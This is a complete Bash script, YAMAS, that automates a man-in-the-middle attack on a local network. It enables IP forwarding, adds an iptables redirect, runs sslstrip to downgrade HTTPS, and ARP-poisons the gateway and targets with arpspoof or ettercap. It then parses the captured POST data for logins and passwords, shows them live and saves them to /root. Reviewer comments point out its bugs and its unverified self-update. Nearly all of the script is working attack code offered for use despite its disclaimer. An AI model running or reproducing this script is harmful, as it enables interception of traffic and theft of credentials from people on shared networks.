- #!/bin/bash
# Bash script to launch a man-in-the-middle attack and sslstrip.
- # version 0.9 by comaX
version="0.9.4" # current script version; compared (as a string) against the downloaded one below
# if user ^C then execute cleanup function
# NOTE(review): only SIGINT is trapped. A SIGTERM or an uncaught error leaves
# ip_forward enabled and the nat REDIRECT rule in place; `trap fast_cleanup EXIT`
# would cover every exit path (fast_cleanup ends with exit, so re-entry must be guarded).
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
#######################################
# SIGINT handler (installed by the trap above): kills the helper processes this
# script started, disables IP forwarding, flushes iptables, removes the two
# fixed temp files and exits.
# Globals:   looparseid, sslstripid, tailgrepid (read: pids of the xterm helpers)
# Arguments: none -- the trap invokes this with no arguments, so $1/$2 are empty
# Returns:   does not return; exits 0
#######################################
fast_cleanup() {
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ ${looparseid} != "" ]]; then kill ${looparseid}
fi
if [[ ${sslstripid} != "" ]]; then kill ${sslstripid}
fi
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
# NOTE(review): inside a function $1/$2 are the function's own arguments, not the
# script's. Nothing is passed here, so this test is always false and the arpspoof
# branch runs even when the script was started with -e. Record the mode in a
# global at startup (e.g. `mode=$1`) and test that instead.
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
# Fixed, predictable paths under /tmp (created near the end of the script).
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
if [ -e '/tmp/grepcred.txt' ]; then
rm /tmp/grepcred.txt
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
- #Let's define some arguments that can be passed to the script :
- if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filename
- if [[ $2 == "" ]]; then
- echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
- exit 0
- fi
- clear
- wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
- echo -e "Parsing $2 for credentials.\n\n"
- cat $2 |
- awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
- awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
- egrep -i -a -f /tmp/grepcred.txt |
- awk -F "=" '{if (length($2) < 4) print "";
- else if ($1 ~/Website/) print $0;
- else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
- else print "Login = \t"$2}' |
- uniq
- rm /tmp/grepcred.txt
- exit 0
- fi
- if [[ "$1" = "-e" || "$2" = "-e" ]]; then
- echo -e "\tYou will be using Ettercap instead of ARPspoof."
- sleep 0.5
- fi
- if [[ "$1" = "-h" || "$1" = "--help" ]]; then #define help message
- clear
- echo -e "You are running $0, version $version.
- usage : $0 [-h -c -p]* [-e -s]**
- -h or --help : Display this help message, disclaimer and exit.
- -c or --change: Display changelog and todo.
- -e : Use ettercap instead of ARPspoof. One might have one's reasons...
- ARPspoof is default.
- -p or --parse : Only parse the given <file>. Don't use wildcards.
- Use > /output_file to print to a file.
- -s : The script won't download anything. Make sure you have the needed files.
- *Must be used alone
- **Can be used at the same time.
- \033[31m DISCLAIMER :\033[m
- This program is intended for learning purpose only. I do not condone hacking
- and wouldn't be held responsible for your actions. Only you would face legal
- consequences if you used this script for illegal activities.
- \033[31m What I think should be learnt from this script :\033[m
- This script should teach you how easy it is to steal sensitive online
- credentials and how to protect you from it, provided you understand
- what this program does. The best way to understand what it does is
- to look at its source. This will also teach you basic shell scripting."
- exit 0
- fi
- if [[ "$1" = "-c" || "$1" = "--change" ]]; then #Changelog
- clear
- echo -e "\033[31m Changelog :\033[m
- Should be added in next version/revision :
- - Submit your ideas !
- - We're close to a final version !
- Added in v0.9.x
- - Ettercap support (with -e switch in parameters)
- - Silent mode (-s)
- - Code enhancing.
- Added in v0.8.x
- - Tail-greping log file so we can be sure there is traffic being sniffed
- - New parsing method from scratch : should be lighter, less CPU consuming, and most of all, outputs websites as well.
- This should be tested though to ensure maximum reliability. Please report back !
- 0.8.5 : now grep from downloaded file, to allow more updates on parsing, without updating the whole script.
- - New -p option to allow only parsing a file. (v0.8.5)
- - More improvements.
- - Catching ^C and cleanup before quitting. (v0.8.5)
- - Realtime parsing menu. (V0.8.5)
- \033[31mFeatures :\033[m
- - Output of credentials as they are sniffed in xterm window.
- - Log parsing for user-friendly output.
- - Both arpspoof and ettercap are suported
- - Network mapping for host discovery.
- - Can save \"dumped\" passwords to file.
- - Support for multiple targets on the network.
- - Can parse a single file.
- - Install sslstrip if needed.
- - Display ASCII tables for better readability of creds.
- - All options know default, pressing only enter should get you through.
- - Very neat and kewl ascii =D
- \033[31m Credits :\033[m
- Credits go to all people on backtrack forums for their help and support,
- and google for being my best friend with scripting.
- Special kudos to ShortBuss for something I should have seen a
- long time ago (sslstrip before arpspoof) and many little improvements.
- And of course, to the people responsible for the tools I am using in this script.
- Please criticize this program or submit ideas on the official thread at
- http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
- exit
- fi
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
# NOTE(review): the message is fetched over plain HTTP with no integrity check and
# later printed with `echo -e`, so whatever the server (or anyone on the path)
# returns reaches the terminal with escape sequences interpreted. Printing it
# literally (`printf '%s\n'`) would need the silent-mode default below changed too,
# since that string relies on -e for its leading "\n".
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
message="\nNo message to display : you are running in silent mode"
else
wget -q http://comax.fr/yamas/bt5/message -O /tmp/message # fixed /tmp path
message=$(cat /tmp/message) #store it to variable
rm /tmp/message #remove temp message file
fi
### Check for updates !
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not checking for a new version : silent mode."
else
wget -q http://comax.fr/yamas/bt5/version -O /tmp/version # Get last version number
last_version=$(cat /tmp/version) #store it to variable
rm /tmp/version #remove temp version file
# NOTE(review): `>` inside [[ ]] is a lexical string comparison, not a version
# comparison: "0.10" sorts before "0.9". Compare the dotted fields numerically
# (or use `sort -V`) before trusting this.
if [[ $last_version > $version ]] ; then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)"
read update
if [[ $update = Y || $update = y ]] ; then
echo "[+] Updating script..."
# NOTE(review): self-update = unauthenticated plain-HTTP download written straight
# over the running script ($0, unquoted), then chmod'ed, optionally copied to
# /usr/bin and re-executed. No signature or checksum is verified, so whoever can
# alter that download decides what runs next. Also, if the download fails, -O has
# already truncated $0 to an empty file. Download to a temp file, verify a
# published hash, and only then replace $0.
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' ]] ; then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]] ; then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas # relaunched without the original arguments: -e / -s are lost here
exit 1
else echo "Ok, continuing with updated version..."
sleep 3
$0 # same: re-executed without the original arguments
exit 1
fi
fi
sleep 2
$0 # same: re-executed without the original arguments
exit 1
else echo "Ok, continuing with current version..."
fi
else echo "No update available"
fi
fi
### End of update process
### Install process
# Copies the running script to /usr/bin/yamas if it is not there yet, then
# re-launches the installed copy.
if [[ ! -e '/usr/bin/yamas' ]] ; then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas # $0 unquoted: breaks on a path containing spaces
chmod +x /usr/bin/yamas
rm $0 # the current run keeps going: bash already has the file open
echo "Script should now be installed. Launching it !"
sleep 3
yamas # assumes /usr/bin is on PATH; the original arguments (-e / -s) are not passed on
exit 1
else echo "Ok, not installing then !"
fi
else echo "Script is installed"
sleep 1
fi
### End of install process
- clear
- echo -e "
- _______ _______ _______ _______ _______ _____
- |\ /|( ___ )( )( ___ )( ____ \ |\ /|( __ ) / ___ \
- ( \ / )| ( ) || () () || ( ) || ( \/ | ) ( || ( ) | ( ( ) )
- \ (_) / | (___) || || || || (___) || (_____ | | | || | / | ( (___) |
- \ / | ___ || |(_)| || ___ |(_____ ) ( ( ) )| (/ /) | \____ |
- ) ( | ( ) || | | || ( ) | ) | \ \_/ / | / | | ) |
- | | | ) ( || ) ( || ) ( |/\____) | \ / | (__) | _ /\____) )
- \_/ |/ \||/ \||/ \|\_______) \_/ (_______)(_)\______/ " # <= I love it.
- echo -e "===========================================================================
- =\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
- =\033[31m Use this tool responsibly, and enjoy!\033[m =
- = Feel free to contribute and distribute this script as you please. =
- = Official thread : http://tinyurl.com/yamas-bt5 =
- = Check out the help (-h) to see new features and informations =
- = You are running version \033[32m$version\033[m =
- ==========================================================================="
- echo -e "\033[36mMessage of the day :\033[m"
- echo -e "$message"
- echo
# Starting fresh : reset IP forward and iptables
# NOTE(review): this discards every rule the host already had in the filter and
# nat tables and nothing restores them afterwards (cleanup() flushes again).
# Snapshot them first (`iptables-save > <backup file>`) if the host's own
# firewall matters; note also that --flush leaves the chain policies untouched.
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
- # Defining exit function and other ending features
#######################################
# Menu option 6 ("Quit properly"): stops the helper processes, resets
# ip_forward and iptables, removes the temp files, then asks whether to keep
# the sslstrip log (/tmp/$filename.txt -> /root/$filename.txt) and whether to
# write the parsed credentials to /root/$filename.pass.txt. Offers to install
# the script if /usr/bin/yamas is missing, then exits.
# Globals:   sslstripid, looparseid, tailgrepid (read), filename (read)
# Arguments: none -- final() calls this with no arguments, so $1/$2 are empty
# Returns:   does not return; exits 1 on every path (even the successful ones)
#######################################
cleanup() {
echo
echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"
# Unlike fast_cleanup, these two are not guarded against an empty pid; `kill`
# with no argument just prints its usage and continues.
kill ${sslstripid}
kill ${looparseid}
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
# NOTE(review): $1/$2 are this function's own arguments, and none are passed, so
# the ettercap branch is never taken: with -e the ettercap windows are left
# running. Same issue at the "-s" test further down.
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
rm /tmp/grepcred.txt # removed here, so the "already have a copy" advice below cannot hold
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in /root/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt /root/$filename.txt #moving file  -- $filename is operator input (read at startup), unquoted
if [ -f "/root/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else echo "Logs not saved"
fi
echo
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
if [[ "$1" = "-s" || "$2" = "-s" ]]; then # dead branch: see the $1/$2 note above
echo "Not downloading needed 'grepcred.txt' file because of silent mode. Make sure you already have a copy or the parsing *will* fail."
else
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
fi
# Same pipeline as the -p option at the top of the script.
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print $0;
else print "Login = \t"$2}' |
uniq >> /root/$filename.pass.txt # >> appends to a potential previous file.
# NOTE(review): the `>>` redirection creates the file even when the pipeline
# produced nothing, so this check is always true and "Passwords saved !" is
# printed regardless of whether anything was found.
if [ -f "/root/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else echo "Error while saving passwords" #it does not
fi
else echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [ -f "/usr/bin/yamas" ]; then #check if script is already installed
echo
echo
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
# NOTE(review): `$install="y"` has no spaces around `=`, so it is one word and
# [[ word ]] is simply "is non-empty": any answer other than an empty line
# installs. Should read `$install = "y"`. The copy also assumes the current
# directory holds yamas.sh, whereas the other install paths use $0.
if [[ $install = "Y" || $install="y" ]] ; then
cp ./yamas.sh /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m"
else echo "Script not installed."
fi
fi
exit 1
}
#######################################
# Downloads sslstrip 0.9 from the upstream site and installs it with setup.py.
# Called from the sslstrip version checks below when the user agrees to update.
# NOTE(review): plain-HTTP download, no checksum or signature verification, then
# `setup.py install` (presumably as root, since the script writes /proc and
# /usr/bin): whoever can alter that download gets code execution on this host.
# Verify a known-good hash of the tarball before extracting it.
# NOTE(review): `cd sslstrip-0.9` is unchecked. If the download or extraction
# failed, setup.py runs in the current directory and `cd ..` then climbs one
# level above where the script was started; `cd sslstrip-0.9 || return 1` would
# stop that. The extracted directory is left behind in the working directory.
# Globals:   none
# Arguments: none
#######################################
updatestrip() {
wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python ./setup.py install > /dev/null # stdout silenced, stderr still shown
cd ..
rm sslstrip-0.9.tar.gz
}
- search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
- #We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
- #so there is no need to do it twice.
- rescan () {
- echo -e "\033[31m"
- nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
- echo -en "\033[m"
- final
- }
- add_target() {
- echo "Enter a new IP adress to attack :"
- read newip
- xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
- final
- }
#######################################
# Menu option 3: prints the ASCII / URL-encoding correspondence table, then
# returns to the main menu.
# NOTE(review): final() calls this with no arguments and $1/$2 are the function's
# own positionals, so the silent-mode branch is never taken from the menu: the
# table is always fetched over plain HTTP into a fixed /tmp path. Were the
# branch taken, it writes /tmp/ascii and never removes it.
# Globals:   none
# Arguments: none (see note)
#######################################
ascii() {
clear
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "ASCII tables won't be available"
echo "ASCII tables are not available" > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
cat /tmp/ascii # server-supplied bytes go straight to the terminal
rm /tmp/ascii
fi
final
}
- tailsecure() {
- xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f /tmp/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
- final
- }
#######################################
# Real-time parsing (RTP) sub-menu: pause, resume, kill or relaunch the xterm
# running /tmp/looparse.sh. Re-displays itself after every action; option 5
# hands control back to final().
# Globals:   looparseid (read; option 4 overwrites it with the new xterm's pid;
#            option 3 leaves the dead pid in place, so a later 1/2 signals a
#            process that is gone)
# Arguments: none
#######################################
rtparse() {
  local action
  echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
  read action
  case "$action" in
    1)
      echo -e "\033[33m[+]Pausing...\033[m"
      kill -19 ${looparseid} # 19 is SIGSTOP on x86/ARM Linux; `kill -STOP` is the portable spelling
      echo -e "\033[33m[-]Paused.\033[m"
      rtparse
      ;;
    2)
      echo -e "\033[33m[+]Resuming...\033[m"
      kill -18 ${looparseid} # 18 is SIGCONT on x86/ARM Linux; `kill -CONT` is the portable spelling
      echo -e "\033[33m[-]Resumed.\033[m"
      rtparse
      ;;
    3)
      echo -e "\033[31m[+]Killing...\033[m"
      kill ${looparseid}
      echo -e "\033[33m[-]Killed.\033[m"
      rtparse
      ;;
    4)
      echo -e "\033[32m[+]Launching...\033[m"
      xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
      sleep 2
      echo -e "\033[33m[-]Launched.\033[m"
      rtparse
      ;;
    5)
      echo "Previous"
      final
      ;;
    *)
      echo -e "\033[31mBad choice bro !\033[m\n"
      rtparse
      ;;
  esac
}
#######################################
# Main menu shown once the attack is running. Reads one choice and dispatches
# to the matching function. Each of those (rescan, add_target, ascii,
# tailsecure, rtparse) calls final() again when done, and cleanup() exits, so
# this function never returns on its own. An unrecognised answer re-prompts.
# Globals:   none read directly
# Arguments: none
#######################################
final() {
  local choice
  echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Tail-grep hosts through output (make sure there is traffic).
5. Real-time parsing...
6. Quit properly.
Enter the number of the desired option."
  read choice
  case "$choice" in
    1) rescan ;;
    2) add_target ;;
    3) ascii ;;
    4) tailsecure ;;
    5) rtparse ;;
    6) cleanup ;;
    *)
      echo -e "\033[31mBad choice bro !\033[m\n"
      final
      ;;
  esac
}
- ###############################End of functions#############################
- # IP forwarding
- echo
- echo -e "\033[31m [+] Activating IP forwarding... \033[m"
- echo "1" > /proc/sys/net/ipv4/ip_forward
- echo "[-] Activated."
- #Iptables
- echo
- echo -e "\033[31m [+] Configuring iptables... \033[m"
- echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
- echo
- read -e outport
- if [ "$outport" = "" ] ; then
- outport=8080
- echo -e "Port $outport selected as default.\n"
- fi
- echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
- echo
- read -e inport
- if [ "$inport" = "" ] ; then
- inport=80
- echo -e "Port $inport selected as default.\n"
- fi
- echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
- iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
- echo "[-] Traffic rerouted"
- #Sslstrip
- echo
- echo -e "\033[31m [+] Activating sslstrip... \033[m"
- echo "Choose filename to output : (default = yamas)"
- read -e filename
- if [ "$filename" = "" ] ; then
- filename="yamas"
- fi
- echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
- #### BEGIN of update process ####
- if [[ "$1" = "-s" || "$2" = "-s" ]]; then
- echo "Not checking for updates here either. Sslstrip should be installed or attack will fail."
- sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
- else
- if [ -e '/usr/local/bin/sslstrip' ]; then # If sslstrip exists
- sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
- if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
- echo -e "Sslstrip version $sslversion is installed but a newer one (0.9) exists. Do you want to update \033[4mand\033[m install latest
- version ? [Y/N]
- Note that it will download it from the official website, but might be not supported by BT team on the forums as long as it's not in the repos. It
- should be safe to use though."
- read -e sslupdate
- if [[ $sslupdate = "Y" || $sslupdate = "y" ]] ; then #if yes, updating.
- updatestrip
- sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
- if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
- else echo "\033[33mOops, install failed.\033[m Continuing with current version."
- fi
- else echo "All right, continuing with current version."
- fi
- elif [[ $sslversion = "0.9" ]]; then
- echo -e "\n\033[32mSslstrip is up to date, continuing...\033[m"
- fi
- elif [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
- sslversion=$(cat /pentest/web/sslstrip/sslstrip.py | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
- if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
- echo -e "Sslstrip v$sslversion was found, not installed, but executable. Do you want to \033[4mU\033[mpdate or \033[4mC\033[montinue ? "
- read -e sslupdate
- if [[ $sslupdate = "U" || $sslupdate = "u" ]] ; then #if yes, updating.
- updatestrip
- sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
- if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
- sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
- sleep 3
- else echo "\033[33mOops, install failed.\033[m Continuing with current, non installed version."
- /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
- sleep 3
- fi
- else echo "All right, continuing with current, non-installed version."
- /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
- sleep 3
- fi
- fi
- elif [ -e '/pentest/web/sslstrip/sslstrip.py' ]; then
- echo "Sslstrip was found, but not installed and not executable. Making it executable... (not installing)"
- chmod +x '/pentest/web/sslstrip/sslstrip.py'
- if [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
- echo "Now it is. Continuing..."
- /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
- sleep 3
- else echo "Sslstrip couldn't be found. You might be using a wrong version of this script or it is not
- installed.
- You can download BT4r2 version of this script at http://tinyurl.com/mitm-yamas. To install sslstrip use
- apt-get install sslstrip. Do you want to install it ? (will quit after) Y/N"
- read apti
- if [[ $apti = "Y" || $apti = "y" ]] ; then
- apt-get install sslstrip
- exit 1
- fi
- fi
- fi
- fi
- sleep 2 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
- echo
- echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
- echo
- #Arpspoofing
- echo
- echo -e "\033[31m [+] Activating ARP cache poisoning... \033[m"
- echo
- ip route show | awk '(NR == 2) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
- iface=$(ip route show | awk '(NR == 2) { print $5}')
- gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
- echo
- echo "Enter IP gateway adress or press enter to use $gateway."
- read -e gateway
- if [ "$gateway" = "" ] ; then
- gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
- echo -e "$gateway selected as default.\n"
- fi
- echo
- echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
- read -e iface
- if [ "$iface" = "" ] ; then
- iface=$(ip route show | awk '(NR == 2) { print $5}') #store default interface
- echo -e "$iface selected as default.\n"
- fi
- echo -e "\r"
- echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
- Press enter to default."
- read -e choicearp
- echo
- if [[ $choicearp = "D" || $choicearp = "d" ]] ; then
- echo
- echo -e "Do you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
- read -e hosts
- echo -e "\033[31m "
- if [[ $hosts = "Y" || $hosts = "y" ]] ; then
- nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
- echo -e "\033[m " # switch color back to white
- else echo -e "\033[m "
- fi
- echo -e "Please enter targets according to usage : IP1 IP2 IP3...
- \033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
- arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
- while [ "$1" != "" ]; do
- xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
- shift
- done
- echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
- }
- ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
- while [ "$1" != "" ]; do
- xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
- shift
- done
- echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
- }
- read -e parameters
- if [[ "$1" = "-e" || "$2" = "-e" ]]; then
- ettercapi $parameters
- else
- arpspoofi $parameters
- fi
- else
- if [[ "$1" = "-e" || "$2" = "-e" ]]; then
- xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
- sleep 2
- echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
- else
- xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
- sleep 2
- echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
- fi
- fi
- echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
- echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
- echo
- echo
- echo "looparse(){" > /tmp/looparse.sh
- if [[ "$1" = "-s" || "$2" = "-s" ]]; then sleep 0.5
- else
- echo "wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt" >> /tmp/looparse.sh
- fi
- echo "while :
- do
- clear
- echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
- cat /tmp/$filename.txt |
- awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
- awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
- egrep -i -f '/tmp/grepcred.txt' |
- awk -F \"=\" '{if (length(\$2) < 3) print \"\";
- else if (\$1 ~/[W]/) print \$0;
- else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
- else print \"Login = \t\t\", \$2}' |
- uniq
- sleep 7
- done
- }
- looparse" >> /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
- chmod +x /tmp/looparse.sh
- xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
- sleep 2
- final #call the "final" function. Yes, it's the final one.
- ### End of the script fellas.